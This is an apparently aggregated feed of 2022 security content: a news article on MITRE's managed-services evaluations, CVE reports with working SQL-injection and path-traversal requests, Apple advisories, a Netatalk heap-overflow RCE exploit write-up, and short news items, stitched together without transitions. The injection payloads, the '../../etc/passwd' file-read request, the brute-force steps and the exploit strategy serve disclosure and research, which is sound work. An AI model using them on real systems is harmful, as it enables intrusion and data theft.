The results are labor-intensive to parse, so knowing how to interpret them is key, security experts say.

A new set of evaluations for managed security service providers that MITRE Engenuity has released can potentially give enterprise decision-makers a handy resource to consult when selecting a provider. The key to benefiting from the information, though, is knowing how to interpret the results, MITRE and others said this week.

MITRE Engenuity's first-ever evaluation of security service providers — like its product evaluations — does not offer any winners or losers, nor any rankings based on performance, nor any indication of how well, or poorly, a vendor might have performed. 

Instead, it offers detailed information on how different security service providers analyze and describe adversary behavior to their clients. MITRE's evaluation leaves it entirely up to security professionals and teams using the data to make any vendor comparisons they might want with it.

**An Objective Look at MDR Capabilities**

"MITRE Engenuity’s ATT&CK Evaluations for Managed Services is likely the only objective demonstration of what’s available in the managed services and managed detection and response (MDR) market," says Katie Nickels, director of intelligence at Red Canary, one of 16 security service providers that participated in the evaluation. "It allows organizations to see a realistic demonstration of how these tools actually work, with those results being provided by a neutral third party."

For the evaluation, MITRE Engenuity gave each of the participating vendors an opportunity to deploy their adversary detection and monitoring tools on a MITRE-hosted Microsoft Azure environment. A MITRE purple team then executed an emulated attack on the environment using tactics and techniques of the well-known Iranian threat group OilRig. 

Service providers that participated in the evaluation knew the simulated attack would happen within business hours in a specific two-week period. However, MITRE did not inform them of more exact timing, what techniques it would use, or which adversary MITRE Engenuity was emulating.

In carrying out the simulated attack, MITRE Engenuity's team showcased commonly used adversary tactics such as spear-phishing for initial access, credential dumping, Web shell installation, lateral movement, data exfiltration, and cleanup. Vendors had an opportunity to use any of the tools in their MDR portfolio to evaluate the malicious activity and report on it. 

But MITRE's rules prohibited them from taking any steps to respond or block the attack because the goal was to see how each service provider detected and analyzed the unfolding attack and the detail and clarity with which it reported their findings.

**Parsing the Results Can Be Challenging**

MITRE Engenuity's evaluation results for each participating service provider offers both a high-level and a detailed view of how each of them detected the attack through the entire chain. It provides a look at the depth of the analysis each vendor provided at each stage, their communications with MITRE during the emulation, the individual techniques that they spotted and reported on, and what context and information they provided about the attack.

The information can be very useful for skilled security professionals who don't have the resources to do their own bake-off and are willing to compare results themselves, says John Pescatore, director of emerging security trends at the SANS Institute. But the data can be difficult to parse for others, he says. 

"MITRE Engenuity purposely doesn't make it easy to rank vendors in their evals," Pescatore says. "So, the tests are not useful for someone who just wants to make a 'safe' choice or compete the top three against each other."

"To compare, I’d have to look at each one and count how many techniques, etc., they covered, and I’d get some kind of ranking,' Pescatore notes. "But in order to understand how they did it, to see how that would fit with my processes, I have to either get info from the vendor or play with the product or service myself."

**Context Is Key**

Nickels from Red Canary says that while the results don't offer a clear apples-to-apples comparison between vendors, that’s not the point. "Every provider is different in how it detects activity and communicate findings, and every organization and security team has different needs," she says.

The best way to get an understanding of the value provided by each vendor in MITRE Engenuity's evaluation is to consider qualitative aspects, such as how each vendor communicated with MITRE during the emulation, the screen shots they took, and the analysis and context they might have provided, she says: "Examining these resources, while labor intensive, will offer organizations the best view into the value provided by each vendor."

In a report this week, Red Canary also highlighted what it described as some limitations of the MITRE Engenuity tests, such as it being too endpoint-focused and being too heavily weighted toward detection coverage and not enough on response. 

"The test required participants to turn off many preventive and other security controls," Nickels says. "Under normal circumstances, most of the vendors who participated would have detected and responded to MITRE’s emulation activity relatively early, thereby preventing the more impactful, later-stage activity."

Another factor to keep in mind when interpreting the results is whether all participating vendors deployed technologies that they normally use for MDR, or if they used something else for the evaluation. "We recommend organizations reviewing these results ask vendors if their environment was normal for the average customer."

**MITRE Engenuity's Recommendation**

In a blog post, Ashwin Radhakrishnan, MITRE Engenuity's general manager of ATT&CK evaluations, recommended that users consider the results in the proper context. Like Nickels noted, MITRE too strongly recommended against organizations merely looking at the total number of techniques a vendor might have detected as the sole yardstick.

"Before starting any analysis of technique coverage, it is important to determine which techniques are most relevant to your organization based on the adversary groups and threats that your organization faces," MITRE said. The blog post offered 10 ways that security practitioners should interpret the evaluation results.

The recommendations include looking at top-level report statuses of the service providers to get a high-level understanding of how they performed in the evaluation, looking at how the service providers presented their findings to their customers, and determining if the service providers correctly attributed the adversary (OilRig). Some of the other measures users consider is whether the service providers recommended any mitigation measures; the length of their reports; the clarity of the language in the reports; and the details in their own releases about the evaluations, MITRE Engenuity said.

MITRE Engenuity Launches Evaluations for Security Service Providers

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /diagnostic/login.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: hujun

vendors:https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

Vulnerability File: /diagnostic\_0/diagnostic/login.php

POST parameter 'username' exists delayed injection vulnerability

Payload1: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(5)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 118
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%285%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(5)), The server response time is 5 seconds

Payload2: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(10)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2810%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(10)), The server response time is 10 seconds

Payload3: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(15)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2815%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(15)), The server response time is 15 seconds

CVE-2022-43135: bug_report/SQLi-1.md at main · junHVV/bug_report

Human Resource Management System v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /hrm/controller/login.php.

**Human Resource Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Deven

vendors:https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /hrm/controller/login.php

POST parameter 'password' exists SQL injection vulnerability

Payload1: name=ab&password=cd'&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 35
    
    name=ab&password=cd'&submit=Sign+In
    

Payload2: name=ab&password=cd''&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 36
    
    name=ab&password=cd''&submit=Sign+In
    

Payload3: name=ab&password=cd'%2b(select\*from(select(sleep(5)))q)%2b'&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 74
    
    name=ab&password=cd'%2b(select*from(select(sleep(20)))q)%2b'&submit=Sign+In
    

The server response time is 20 seconds

CVE-2022-43262: bug_report/SQLi-1.md at main · null302/bug_report

Apple Security Advisory 2022-11-09-2 - macOS Ventura 13.0.1 addresses code execution and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-11-09-2 macOS Ventura 13.0.1

macOS Ventura 13.0.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213504.

libxml2  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNQACgkQ4RjMIDke  
NxkkbBAAsAYMux+v/27NK6+FvyxrTRLkR0yyzp8SorMSfPwZInNGkkEmQxjSzI0+  
D3rK9usf/pouEV9LMnR+Uf37pEdlpSDD7uXZ81m1vhN6RPkz2qD5WdM46RaWTbAS  
/xe3ZEu8+Jpr5SQSWuI+QIBr/vn9Txu/N6l/WQVxnWS+RSWO6tZLLOXMEyVk9vPx  
XJGyQywt3XYoVksvzwAgm/2yslQ+0OWphWjLp73bjQGrrIiClphxmtyvA0SN8Nds  
Ah0+X8SRjCErSN4736U1htKtClSHDowdaD2wevGGUrdRSLJQLTPPkqUPF3P/4/8i  
xW42Zgf9qucN9O89P7ONvHOIe8swtD9vf1AjFXvsDqQvMZQVFDBNXbG138V4LLws  
f5UdpUmY/0lSnVpAZQlo+xuMJSb3SMWYIB2ozhzDLHgBKTxERFB7uyrEYQgXs9XB  
1qg+BbW5uooEoMKbutw36/II/JTFRM34QxWiOJHw4cCypmuaGkSJ/8jsTJDlRvG/  
T9BchgHjBvqHFtCVNLGikkVYzEVQnQLXQAZoZMCYV0benebEIFLIaObaciQqA3F2  
N7/rvpXd5l6G3sEGwqMPT5aYj6Vm/0LBnxuTlN1xN1wgOQoS+LWL8bW+8/HjtJLa  
eyWMh8yD0o02Hf6dNIl9RTuoAKwZvmJbeqi/1uEaoL8sAP9gK1s=CjcG  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-11-09-2

Apple Security Advisory 2022-11-09-1 - iOS 16.1.1 and iPadOS 16.1.1 addresses code execution and integer overflow vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-11-09-1 iOS 16.1.1 and iPadOS 16.1.1iOS 16.1.1 and iPadOS 16.1.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213505.libxml2Available for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An integer overflow was addressed through improved inputvalidation.CVE-2022-40303: Maddie Stone of Google Project Zerolibxml2Available for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: This issue was addressed with improved checks.CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google ProjectZeroAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNIACgkQ4RjMIDkeNxl2og/7Bwq+DwNmc4conLeNZ/4RVZ8Abf2kKMj71ZJrSov1lvW6W9l3NswznKc9pV0Cack8zm1she6dr+HNMYFcsSbFF/OTPKsf2jlZ3aZY5on7FpDdzB8bLDbw0dvSnO2Oc1mgcsBMIuSJBliUfgF0d6L6Hrj7L8Ja0pQP0W5BhcbWbd91wgj2KAQpaX6rgh7oEy7W5GRPJwLAdOfHmpzWws+PjZ3DMlLuGvGRLwEyizsLbq6rX166KG+asXZzCeWygTuKKcpZHG6FwahogBFnfl1ccTGJv4UV/9Ks3WEaZCGx5lpkgw+5H9Wx2HgXTr9Sh01CQVADadfeGp/Iat0TE2hscMZaTm2A1ZdmOeyK70r0jXvCCHtna9spbPO7N0OBERsqS9fC+X/XVHuehIzoUXxFUJAuaXD2weBZHJZBZ7MoUqNm50taDqoYUX0yB2BU0uWOitKfghLRBuFhpuUZtRaZdRfDLSEjSxCTCtGwWnIj4lLlZbE9RAwNNCU12+z6pHHlTxZ9c6IiQF8mrIx4IJ0OMIk6oH3gm71l8T5FSMiLCcuInL0XwC5ragJ/irrxq3GuXL8x+3BjgxnRy4kKy6KUwZsLFp7OI71X/hyjEIyhcXopiRz0PXrooluRUtooyxSCV8M9u3658pFT2+X4WvQASmk3z+ZUnTBQXrfNgWkxyUs=JERa-----END PGP SIGNATURE-----

Apple Security Advisory 2022-11-09-1

In the Netic User Export add-on before 1.3.5 for Atlassian Confluence, authorization is mishandled. An unauthenticated attacker could access files on the remote system.

Vulnerability Type: Unauthenticated Arbitrary File Read

Vendor of Product: Atlassian Confluence

Affected Product Code Base: User Export for Confluence

Product Version: < 1.3.5

Description: The Netic User Export add-on before 1.3.5 for Atlassian Confluence has the functionality to generate a list of users in the application, and export it. During export, the HTTP request has a fileName parameter that accepts any file on the system (e.g., an SSH private key) to be downloaded.

Attack Vectors: Attacker could make an HTTP request to the affected endpoint and download any file from the system.

Attack Type: Remote

Endpoint: /plugins/servlet/confluenceuserexport/admin/download

Assigned CVE-ID: CVE-2022-42977, CVE-2022-42978

Steps To Reproduce

1\. Issue a HTTP POST/GET request to the following endpoint: https://<confluence.example.com>/plugins/servlet/confluenceuserexport/admin/download?fileName=\[file-path\]

#PoC

\[REQUEST\]

GET /plugins/servlet/confluenceuserexport/admin/download?fileName=../../../../../../etc/passwd HTTP/1.1

Host: confluence.example.local

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

\[RESPONSE\]

HTTP/1.1 401

Set-Cookie: JSESSIONID=ABCDEFGHIJKLMNOPQRSTUVWYZ; Path=/; HttpOnly

WWW-Authenticate: OAuth realm="confluence.example.local"

Content-Disposition: attachment; filename=../../../../../etc/os-release

Content-Type: text/html;charset=UTF-8

Content-Length: 407

Not AuthorizedNAME="CentOS Linux"

VERSION="7 (Core)"

ID="centos"

CVE-2022-42978: Unauthenticated Arbitrary File Read

Authentication Bypass by Primary Weakness in GitHub repository kareadita/kavita prior to 0.6.0.3.

The migrate-email endpoint is requiring Email, Username, and Password parameter. This endpoint contain authentication functionality that doesn't have any protection from brute-force attack, which allows an attacker to try every possible password combination without any restriction.

**CWE-307: Improper Restriction of Excessive Authentication Attempts****POC****1\. Send this request to Burpsuite Intruder**

    POST /api/account/migrate-email HTTP/1.1
    Host: 192.168.189.132:5000
    Accept: application/json, text/plain, */*
    DNT: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Referer: http://192.168.189.132:5000/admin/dashboard
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7,ar-SA;q=0.6,ar;q=0.5
    Connection: close
    Content-Type: application/json
    Content-Length: 67
    
    {"Email":"xxx@local.com",
    "Username":"admin",
    "Password":"xxx"
    }
    

**2\. Mark on the Password value**

**3\. Bruteforce attack with 1000 password list and get valid admin password**

**Impact**

An attacker could perform a brute-force attack targeting normal and administrative users, using different passwords and eventually gain access to the targeted account, without any restriction.

CVE-2022-3993: No Rate Limit On migrate-email Endpoint Leads to Brute-force Attack in kavita

Netatalk through 3.1.13 has an afp_getappl heap-based buffer overflow resulting in code execution via a crafted .appl file. This provides remote root access on some platforms such as FreeBSD (used for TrueNAS).

5 minute read

**TL;DR**

Hi all, This is my first blog in this page. Actually this is my second blog, but first one is missed on the previous website. I will push it again in this page. Please feed free comment or create issue in github if you detect my misstakes.

**Overview**

Oftenly, I found a product from pwn2own to audit. I found an amazing blog which discription about CVE-2022-23121 in Pwn2own. I tried to audit the source code of Netatalk 3.1.13 to understand the vulnerability clearly. Of couse with a hope to find a new vulnerability for next Pwn2own.

**Vulnerability**

When finding new bug, I often focus to memory corruption, so I find some function like memcpy, strcpy, … Because the Netatalalk works with specific protocol (AFP) and file formats. Moreover, CVE-2022-23121 occurs when parsing .AppleDouble file. Therefore I found some other file format and found .appl. The function to read .appl file is afp_getappl:

        /* fake up a cname */
        cbuf = obj->newtmp;
        q = cbuf;
        *q++ = 2;	/* long path type */
        *q++ = (unsigned char)len;
        memcpy( q, p, len );
    

afp_getappl also has:

        buf = obj->oldtmp;
        while (( cc = read( sa.sdt_fd, buf, sizeof( appltag )
                            + sizeof( u_short ))) > 0 ) {
            p = buf + sizeof( appltag );
            memcpy( &len, p, sizeof( len ));
            len = ntohs( len );
            p += sizeof( u_short );
            if (( cc = read( sa.sdt_fd, p, len )) < len ) {
                break;
            }
            if ( sa.sdt_index == aindex ) {
                break;
            }
            sa.sdt_index++;
        }
        if ( cc <= 0 || sa.sdt_index != aindex ) {
            *rbuflen = 0;
            return( AFPERR_NOITEM );
        }
        sa.sdt_index++;
    

We can see len variable parse from 2 bytes (u_short types) and read len bytes to some buffer afterward. we also need understand obj (is object of AFPObj):

    typedef struct AFPObj {
        const char *cmdlineconfigfile;
        int cmdlineflags;
        const void *signature;
        struct DSI *dsi;
        struct afp_options options;
        dictionary *iniconfig;
        char username[MAXUSERLEN];
        /* to prevent confusion, only use these in afp_* calls */
        char oldtmp[AFPOBJ_TMPSIZ + 1], newtmp[AFPOBJ_TMPSIZ + 1];
        void *uam_cookie; /* cookie for uams */
        struct session_info  sinfo;
        uid_t uid;  /* client login user id */
        uid_t euid; /* client effective process user id */
        int ipc_fd; /* anonymous PF_UNIX socket for IPC with afpd parent */
        gid_t *groups;
        int ngroups;
        int afp_version;
        int cnx_cnt, cnx_max;
        /* Functions */
        void (*logout)(void);
        void (*exit)(int);
        int (*reply)(void *, int);
        int (*attention)(void *, AFPUserBytes);
        int fce_version;
        char *fce_ign_names;
        char *fce_notify_script;
        struct sl_ctx *sl_ctx;
    } AFPObj;
    

with AFPOBJ_TMPSIZ is 4096 as default, len is 0xffff as max, so we have a heap-based buffer overflow at here.

**Exploit**

Between parsing len and call memcpy like above, afp_getappl have one more piece:

       {
    #define hextoint( c )	( isdigit( c ) ? c - '0' : c + 10 - 'a' )
    #define islxdigit(x)	(!isupper(x)&&isxdigit(x))
    
            char	utomname[ MAXPATHLEN + 1];
            char		*u, *m;
            int		i, h;
    
            u = p;
            m = utomname;
            i = len;
            while ( i ) {
                if ( *u == ':' && *(u+1) != '\0' && islxdigit( *(u+1)) &&
                        *(u+2) != '\0' && islxdigit( *(u+2))) {
                    ++u, --i;
                    h = hextoint( *u ) << 4;
                    ++u, --i;
                    h |= hextoint( *u );
                    *m++ = h;
                } else {
                    *m++ = *u;
                }
                ++u, --i;
            }
    
            len = m - utomname;
            p = utomname;
    
            if ( p[ len - 1 ] == '\0' ) {
                len--;
            }
        }
    

Basically, the above code will copy and decode byte by byte from p to a buffer in stack. If I exploit stack buffer overflow in m to override return address, overlap memory will be occured. Therefore so hard to control addresses. Therefore, I tried to find to bypass it.

I decided using

        while (( cc = read( sa.sdt_fd, buf, sizeof( appltag )
            ...
            if (( cc = read( sa.sdt_fd, p, len )) < len ) 
    

to overflow buffer p (point to obj->oldtmp + 6) in the first piece code which I showed above and using

        if ( cc <= 0 || sa.sdt_index != aindex ) {
            *rbuflen = 0;
            return( AFPERR_NOITEM );
        }
    

to break loop and exit function without reaching decoding byte to byte. Becasue aindex is parsed from AFP packet, I try to set it to some values (different 0 and 1) and it worked :))).

Finally, we need trigger shell and run command, I do not use any House of ... because I am so noob :((, so I tried to override address at end of AFPObj. In first try, I tried override reply or exit function pointer in obj. I found send_reply function call:

        obj->reply(obj->dsi, err);
        obj->exit(0);
    

But noway to control argument. Luckily I found that send_fce_event function will check obj->fce_notify_script and run command:

        bstring cmd = bformat("%s -v %d -e %s -i %" PRIu32 "",
                              obj->fce_notify_script,
                              FCE_PACKET_VERSION,
                              fce_event_names[event],
                              event_id);
        (void)afprun_bg(1, bdata(cmd));
    

and afprun_bg:

    int afprun_bg(int root, char *cmd){
        ...
        execl("/bin/sh","sh","-c", cmd, NULL);
        ...
    

I override the *fce_notify_script with pointer which point to command. It is easy to indentify because AFPObj is saved on .bss segment.

**Exploit strategy**

I found that .appl file will be stored in current sharing dictionary if having config (vol dbnest = yes) and it is default setting in FreeBSD. It means, this is RCE vulnerability in FreeBSD and LPE in other OS. I create a demo in TrueNAS with guest allow and SMB enable.

Checksec of afpd:

        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x200000)
        RUNPATH:  b'/usr/local/lib'
    

1.  Create pre .appl file with:
    *   len is over 4096 and contain length of command and padding in AFPObj ( = (fce_off+8*3).to_bytes(2, 'big'))
    *   command to run
    *   padding with \x00 in fce_off-len(cmd) times.
    *   fce_version is 1
    *   address point command.
2.  using SMB to update and modify the .appl file in local in ./AppleDouble/<x>/<xyzt>.appl
3.  Send AFP packet afp_getappl with aindex is a big number (like 10, 15)
4.  Trigger excute command send AFP packet afp_logout

**Conclusion**

With hoping get a bounty because Netatalk appeared in Pwn2own 2021, I tried report this vulnerability to zdi, TrueNAS, Synology. But noone resolve this. After a half of year, I decided public this blog and no bounty :((.

CVE-2022-45188: [1day to 0day] Netatalk from Pwn2own 2021 to 0x00 cent in 2022

Bug emerges from ambition to find ‘end-to-end exploits beyond DoS’

Adam Bannister 11 November 2022 at 15:37 UTC

Bug emerges from ambition to find ‘end-to-end exploits beyond DoS’

A prototype pollution vulnerability that could lead to remote code execution (RCE) in Parse Server has been patched.

An attacker could potentially trigger RCE through the MongoDB BSON \[Binary JSON\] parser by leveraging the flaw (CVE-2022-39396), according to a GitHub security advisory published on November 8.

Parse Server is a popular, open source API server module for Node.js that provides push notification functionality for iOS, macOS, Android, and tvOS.

BACKGROUND Prototype pollution: A dangerous and underrated vulnerability impacting JavaScript applications

Although the security researchers involved are withholding technical details to give developers time to apply patches, so the detail remains unclear, we know the bug is comparable to another prototype pollution-to-RCE issue they disclosed earlier in the year. That vulnerability – which surfaced in March 2022 – was given the highest possible severity rating of CVSS 10.

**Patch now**

“I can confirm that both vulnerabilities have the highest impact because they affect the default configuration of Parse Server and allow an attacker to control the system remotely without any authentication,” Mikhail Shcherbakov, a researcher from the KTH Royal Institute of Technology in Stockholm, told The Daily Swig. “So my advice is to patch Parse Server ASAP, if you have it.”

The flaw has been patched in the NPM parse-server package in versions 4.10.18 and 5.3.1.

The patches prevent prototype pollution in the MongoDB database adapter. If updates cannot be applied immediately, then users can protect themselves in the meantime by disabling RCE through the MongoDB BSON parser.

**‘Complex task’**

The flaw was discovered during a research project undertaken by Shcherbakov, KTH colleague Musard Balliu, and Cristian-Alexandru Staicu from the Helmholtz Center for Information Security (CISPA) in Saarbrücken, Germany.

The trio investigated how prototype pollution vulnerabilities in Node.js systems might lead to RCE attacks.

“The detection of prototype pollution is a complex task,” said Shcherbakov. “However, the exploitation that demonstrates a high impact of vulnerabilities is more complicated in practice but still possible.”

The researchers have presented their findings, which also feature Node.js targets NPM CLI and Rocket.Chat, in a white paper (PDF). They are due to present their research at the USENIX Security ’23 conference.

**Universal gadgets**

Prototype pollution, which affects Node.js and prototype-based languages like JavaScript, involves injecting “properties into an object’s root prototype at runtime \[to\] subsequently trigger the execution of legitimate code gadgets that access these properties on the object’s prototype,” explains the presentation precis.

The researchers set out to find “end-to-end exploits beyond DoS in full-fledged Node.js applications”, and “the first multi-staged framework that uses multi-label static taint analysis to identify prototype pollution in Node.js libraries and applications, as well as a hybrid approach to detect universal gadgets”.

Technical details for the Parse Server RCE will eventually be disclosed via the Trend Micro Zero Day Initiative (ZDI) blog.

Other significant security bugs addressed in Parse Server this year include an issue that enabled brute-force guessing of sensitive user data, and a high severity authentication bypass impacting Apple Game Center.

RELATED Prototype pollution bug exposed Ember.js applications to XSS

Prototype pollution project yields another Parse Server RCE

Two long-running surveillance campaigns have been found targeting the Uyghur community in China and elsewhere with Android spyware tools designed to harvest sensitive information and track their whereabouts.
This encompasses a previously undocumented malware strain called BadBazaar and updated variants of an espionage artifact dubbed MOONSHINE by researchers from the University of Toronto's

Two long-running surveillance campaigns have been found targeting the Uyghur community in China and elsewhere with Android spyware tools designed to harvest sensitive information and track their whereabouts.

This encompasses a previously undocumented malware strain called BadBazaar and updated variants of an espionage artifact dubbed MOONSHINE by researchers from the University of Toronto's Citizen Lab in September 2019.

"Mobile surveillance tools like BadBazaar and MOONSHINE can be used to track many of the 'pre-criminal' activities, actions considered indicative of religious extremism or separatism by the authorities in Xinjiang," Lookout said in a detailed write-up of the operations.

